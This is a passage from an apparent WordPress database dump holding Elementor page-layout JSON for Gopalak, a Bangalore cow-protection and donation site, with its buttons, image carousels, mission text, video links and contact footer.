Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11013,1831,'_elementor_page_assets','a:0:{}'),(11015,1832,'_elementor_edit_mode','builder'),(11016,1832,'_elementor_template_type','wp-page'),(11017,1832,'_elementor_version','3.7.8'),(11018,1832,'_wp_page_template','elementor_canvas'),(11019,1832,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vime